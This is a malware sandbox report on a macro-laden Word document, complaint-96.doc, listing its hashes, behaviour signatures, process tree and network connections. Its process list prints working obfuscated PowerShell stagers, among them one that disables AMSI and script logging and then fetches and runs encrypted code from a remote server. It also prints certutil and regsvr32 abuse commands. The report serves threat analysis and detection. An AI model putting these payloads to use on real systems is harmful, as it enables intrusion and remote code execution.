analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

complaint-96.doc

Full analysis: https://app.any.run/tasks/1d700be1-2678-42b0-94de-5e90ce180869
Verdict: Malicious activity
Analysis date: February 19, 2019, 08:37:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: cobalt, Template: Normal.dotm, Last Saved By: cobalt, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 30 23:22:00 2018, Last Saved Time/Date: Tue Oct 30 23:22:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 30, Security: 0
MD5:

8EC83DBA30C4F4D014899FBCC9A78171

SHA1:

96A942174C55F5F3AB7236EB7E3AC549B67C88DB

SHA256:

D57F128AFB4843B6F0072FADDA8DD14046B31703098E365BC5A226E117090D44

SSDEEP:

1536:W1J7YxuapCK+9U8wrvBtBeyaE/XDo3ZiweGpDoxGpdm+ynJWIER:SJsxuaoL9U8wrZzRsIweGs8MBWI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • cMd.exe (PID: 296)

    • Changes the autorun value in the registry

      • regsvr32.exe (PID: 3196)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3004)
      • cMd.exe (PID: 296)
      • certutil.exe (PID: 3540)
      • powershell.exe (PID: 3280)

    • Starts Microsoft Office Application

      • powershell.exe (PID: 3004)

    • Starts CertUtil for decode files

      • cMd.exe (PID: 296)

    • Starts CMD.EXE for commands execution

      • cMd.exe (PID: 296)

    • Application launched itself

      • cMd.exe (PID: 296)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 304)

    • Executes PowerShell scripts

      • regsvr32.exe (PID: 3196)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2984)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2984)
      • WINWORD.EXE (PID: 3788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: cobalt
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: cobalt
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:10:30 23:22:00
ModifyDate: 2018:10:30 23:22:00
Pages: 1
Words: 5
Characters: 30
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 34
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Titre
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Document Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
9
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe winword.exe no specs cmd.exe no specs reg.exe no specs certutil.exe no specs regsvr32.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2984"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\complaint-96.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
4294967295
Version:
14.0.6024.1000
296cMd /c C:\Users\admin\AppData\Roaming\6LwDafxxGk2o.batC:\Windows\system32\cMd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3004powershell.exe -C ".( $ENV:coMSpEC[4,26,25]-Join'')( neW-obJeCt sYsTem.io.stReAMrEAdER(( neW-obJeCt sYstEM.io.cOMPreSSION.DEFLaTestreAm([sySTeM.Io.mEmoRyStREAM] [CONverT]::fROMbasE64sTrInG( 'pVNRa9swEH4P+D8cnsHWXDnxulGaEFjIkrWMNCVZCazugyufFw3H8iS1Tjb233d2nDH2MsaMfBx3p0/ffToZqypeaSXQGOBlukOoZVkrnQGfKy0Q+ExrpSfCSlXCWhZY2uIwVaWV5ROOnJ6X5zAG18PyeWhxVyVZHGVKuE4vuMGaLx+/oLCwPhhKRjdoow0+TgtJMCx6p+qyUGk2J9gg8LfWD31bkTH0D/v9dJdz8nIdKf25n8XkEzZZ4bMzoJMZEciVhsCT4zgegSeBFxbii8YNQwbfiWCV2i1RDN6j5dcNRa0q1PYA7tWH6d0wWS/nHzeT1SxZSKGVUblNlnkuBSaejAbJhsRIVmhkQ1ocEpc5vRXu1DO2aMBvG/zjKVyjeNLm76r9+B/ewT8Qb6QFNyR1F6u79Jy0++QzPl1hVUzEDCC4F1epfri8CI/Om7hzLgfsrPNeMdbNRuBfN3dEXcc+Y5HbChC7LVmi+jZoSUemKqQN/JdUQ6m0qm6PrVD2Pn5wei9qLS3yrTK2iVFAHwWVDd5pg9OTeWDRWN4qcQoz0gbo+23DH7NH09jVut0Ut4LT8vaDMXW8pa7OX7ORl+q4UdjvU1NfwWcQApU09kS6DYyMTbX99U66FxLhni66lrBI93Inv2EGDaDT+wk=' ) , [iO.COMprEsSION.cOMPREsSionMode]::dECOmPresS )) , [sYsTem.tEXt.enCoDING]::aSciI) ).reADtOeNd()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3788"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /q "" C:\Program Files\Microsoft Office\Office14\WINWORD.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
304C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\cmd.execMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3076reg query "HKCU\Software\Microsoft\Notepad" /V adminC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3540certutil -decode temp.txt Hj1izBtynKbLR.txtC:\Windows\system32\certutil.execMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3196regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\Hj1izBtynKbLR.txt scrobj.dllC:\Windows\system32\regsvr32.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3280"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJpQy5EaWNUSU9OYXJ5W1NUUkluZyxTeVNUZW0uT0JKZUN0XV06Ok5ldygpOyR7dmBBbH0uQUREKCgnRScrJ25hYmxlJysnU2NyaXAnKyd0QicpKygnbG9jJysna0wnKydvZ2dpJysnbmcnKSwwKTske1ZgQWx9LkFkZCgoJ0VuYWJsZVNjcmknKydwdEJsbycrJ2NrSW4nKyd2bycrJ2NhdCcrJ2lvJysnbicrJ0xvJysnZ2dpbmcnKSwwKTske2dgUGN9WygoJ0hLJysnRVknKydfJysnTE9DQUxfTScrJ0FDSElORVBXJysnTVNvZnR3JysnYScrJ3JlJysnUCcrJ1dNUCcrJ29saScrJ2NpJysnZXNQV01NaScrJ2NyJysnb3NvZnQnKydQV01XaScrJ25kb3dzUFdNUCcrJ293JysnZXJTaCcrJ2VsJysnbFBXTVNjcmlwJysndEInKS5yZVBMYWNFKCdQV00nLCdcJykpKygnbG8nKydja0xvZycrJ2dpbmcnKV09JHt2YEFMfX1FTHNle1tTY1JpUHRCTE9ja10uIkdFVEZJZWBMRCIoKCdzaScrJ2duYScrJ3R1cmVzJyksJ04nKygnb25QdWJsaWMsU3RhJysndGknKydjJykpLlNFVFZhTFVlKCR7TnVgTEx9LChORXctT0JqRWN0IENvbExlQ3RJb25TLkdlbkVSaWMuSEFTSFNFdFtzVHJJTmddKSl9W1JlZl0uQXNTRW1CTHkuR0VUVHlwZSgoJ1MnKyd5c3RlbS5NYW5hZycrJ2VtZW50LkF1dG8nKydtYXRpbycrJ24nKycuQW0nKydzaVV0aWxzJykpfD97JHtffX18JXske199LkdldEZpRUxEKCgnYW1zaUluaXRGYScrJ2knKydsJysnZWQnKSwoJ05vJysnblB1JysnYmxpYyxTdCcrJ2F0aScrJ2MnKSkuU2V0VmFMVWUoJHtOdWBMbH0sJHt0UmBVZX0pfTt9O1tTeXN0RW0uTkV0LlNlclZpY2VQT0lOdE1hTkFnRXJdOjpFeFBFQ3QxMDBDT25UaU51RT0wOyR7d2BDfT1OZVctT0JqRWNUIFNZc1RlbS5OZVQuV0ViQ0xJZU5UOyR7dX09KCdNb3ppJysnbGxhLzUnKycuMCAoV2luZG93JysncyBOVCAnKyc2LjE7JysnIFcnKydPJysnVzYnKyc0OyBUcmknKydkZScrJ250LzcuMDsgcnYnKyc6MTEuMCcrJyknKycgbGknKydrZSBHZWMnKydrbycpO1tTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHske1RSYFVFfX07JHtXY30uSEVhREVycy5BZGQoKCdVc2VyLUFnJysnZScrJ250JyksJHtVfSk7JHt3YGN9LlBSb1h5PVtTWXN0ZW0uTkVULldFQlJFUXVlU3RdOjpEZUZhdUxUV0ViUHJPWFk7JHt3Q30uUHJPeFkuQ3JFZEVOVGlBTHMgPSBbU1lzVEVtLk5FdC5DUmVkZW50aUFMQ2FDSEVdOjpEZUZhVUx0TmV0d09SS0NyZURlbnRpYUxTOyR7U2BDUmBpUFQ6UHJPWFl9ID0gJHtXQ30uUHJveHk7JHtLfT1bU1lTVGVNLlRFWHQuRU5jb2RJTkddOjpBU0NJSS5HRVRCeVRFcygoJzdhODYxYzhmMScrJzI1JysnZTYnKyc5M2I0ZTEnKycxJysnOTInKyczNicrJ2Y2JysnYzc3JysnYjg3JykpOyR7cn09eyR7ZH0sJHtrfT0ke2FSYGdTfTske3N9PTAuLjI1NTswLi4yNTV8JXske0p9PSgke0p9KyR7U31bJHtffV0rJHtLfVske199JSR7a30uQ291bnRdKSUyNTY7JHtTfVske199XSwke3N9WyR7an1dPSR7c31bJHtqfV0sJHtTfVske199XX07JHtkfXwleyR7SX09KCR7aX0rMSklMjU2OyR7SH09KCR7SH0rJHtTfVske2l9XSklMjU2OyR7c31bJHtpfV0sJHtzfVske2h9XT0ke3N9WyR7SH1dLCR7U31bJHtpfV07JHtffS1iWE9yJHtTfVsoJHtzfVske2l9XSske3N9WyR7SH1dKSUyNTZdfX07JHtzYEVyfT0oJ2h0dHBzOi8nKycvJysnMTgnKyc1LjEwLjY4LjE4OTo0JysnNCcrJzMnKTske1R9PSgnL2FkJysnbScrJ2luL2dldC4nKydwaHAnKTske1dDfS5IZUFkRVJTLkFEZCgoJ0NvJysnbycrJ2tpZScpLCgnc2VzcycrJ2lvbj1TJysnQjAnKycvYlZmSCcrJ0hoN1ZyMWNqa2Z4NzZ1WXYnKydycGM9JykpO3doaWxlKC1ub3QgJHtkYEFUYX0peyR7ZGBBVEF9PSR7V2BjfS5Eb3dOTE9BRERBVEEoJHtTYEVSfSske3R9KTtzdGFydC1zbGVlcCAzfTske0lWfT0ke2RBYFRBfVswLi4zXTske2RBYFRBfT0ke0RgQVRBfVs0Li4ke2RgQVRBfS5MZU5HVEhdOy1Kb0luW0NIYXJbXV0oJiAke1J9ICR7RGBBdGF9ICgke2lgVn0rJHtLfSkpfElFWA==')) | IEXC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
regsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 119
Read events
1 565
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
4
Unknown types
6

Dropped files

PID
Process
Filename
Type
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE8ED.tmp.cvr
MD5:
SHA256:
3004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P4DRK7XAYGWEA9DJPYBJ.temp
MD5:
SHA256:
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF48879876D4FB34E5.TMP
MD5:
SHA256:
3788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFEC7.tmp.cvr
MD5:
SHA256:
3280powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I8TV828OCVPDEW7640WB.temp
MD5:
SHA256:
3004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f4c4.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E7B61C210005698197542125CEEC8FCF
SHA256:AABB3BCAB2DECA4FCB0202CDDE079E717F6BDBDD72C69CB0CC36D8F468AE9A3A
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:6A06BF2A3F03061CF2A29A13EF895464
SHA256:4A26F7029C38170A267DD06B987FDDF15D745A918061118BDEAE147FB796B8BA
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$mplaint-96.docpgc
MD5:649F1FEE8CB24204CD65DA7F09D1178C
SHA256:8668CF7A42CDE3A89D411D4A524940AAE4126D1A04A6294F289508396182E984
3004powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
74
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3004
powershell.exe
51.38.150.171:443
amf-fr.org
GB
unknown
3280
powershell.exe
185.10.68.189:443
Flokinet Ltd
SC
suspicious

DNS requests

Domain
IP
Reputation
amf-fr.org
  • 51.38.150.171
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
complaint-96.doc